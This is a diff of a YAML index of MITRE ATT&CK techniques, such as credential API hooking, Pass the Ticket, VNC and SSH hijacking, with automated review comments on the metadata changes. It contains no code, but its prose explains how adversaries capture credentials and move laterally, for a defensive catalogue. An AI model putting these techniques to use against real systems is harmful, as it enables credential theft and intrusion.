- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
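Review bot: The T1056.004 rewrite is mostly key reordering, but it also silently drops `x_mitre_permissions_required` (Administrator, SYSTEM) with no replacement and bumps `x_mitre_version` from '1.0' to '1.1', and T1602.001 at the top of the hunk loses `x_mitre_attack_spec_version: 2.1.0` without gaining the 3.2.0 value every other rewritten object receives. Call these out in the commit message or split them from the reorder so a reviewer does not have to diff the two long blocks by hand. Two nits in the new T1213.005 block: the 'Sentinel Labs NullBulge 2024' description string starts with a leading space (" Jim Walter."), and `x_mitre_detection: ''` is an empty string where other techniques either omit or populate the field; both look like upstream artefacts worth normalizing in the generator.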
@@ -42594,6 +43281,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -42603,7 +43291,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -42619,66 +43306,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
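Review bot: Inside the T1021.005 reference reorder, the 'Havana authentication bug' entry actually changes: the URL moves from http:// to https:// and 'Retrieved October 6, 2021' becomes 'Retrieved September 12, 2024'. Both are fine (the https link is preferable), but they are the only real edits among roughly sixty moved lines, so mention them in the commit message; the `x_mitre_modified_by_ref` line added at the end of the object is likewise the re-add of the key deleted in the hunk above, not a new field.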
@@ -42703,11 +43391,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -42730,9 +43418,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -42783,7 +43470,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
@@ -42847,7 +43533,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -42918,7 +43603,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -42955,7 +43639,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
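Review bot: the `modified` timestamp for T1563.001 (SSH Hijacking) moves backwards in this hunk, from `2021-04-29T14:49:39.188Z` to `2020-03-23T23:11:24.682Z`. A regenerated index should not carry an older modification date than the one it replaces unless the source object genuinely changed; this looks like the generator now reading a different (older) copy of the object. Please confirm against the source bundle before merging, or explain in the commit message why the earlier date is the correct one.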
@@ -42986,8 +43670,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
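Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1563.001 without adding anything back, whereas every other entry in the patch that loses a `2.1.0` or `3.1.0` value gets `x_mitre_attack_spec_version: 3.2.0` in its place (compare T1080 and T1021.006). The same gap appears for T1210 in the `-43779,12 +44454,10` hunk. After this change those two techniques carry no ATT&CK spec version at all, so a consumer that filters or validates on the field will treat them differently from their neighbours. Either emit `x_mitre_attack_spec_version: 3.2.0` for them as well or note why these objects are exempt.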
@@ -43070,12 +43752,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -43102,6 +43783,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -43119,12 +43801,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -43150,14 +43832,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -43275,7 +43956,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -43329,11 +44009,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -43385,14 +44064,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -43478,12 +44156,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -43503,6 +44180,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -43510,7 +44188,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -43526,39 +44203,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
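Review bot: in the T1550.003 reference block the GentilKiwi entry now points at a `web.archive.org` snapshot with the retrieved date moved to September 12, 2024, which is the right fix for a dead blog URL. The surrounding reorder of the ADSecurity, GentilKiwi and CERT-EU entries, however, adds about twenty removed and re-added lines with no content change, and `x_mitre_modified_by_ref` is deleted in the preceding hunk only to be re-added here after `x_mitre_attack_spec_version`. If the generator can preserve upstream reference order, or sort `external_references` by `source_name` and emit keys in a fixed order, hunks like this become reviewable at a glance.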
@@ -43583,12 +44261,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -43602,13 +44279,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -43625,7 +44301,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -43673,7 +44349,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
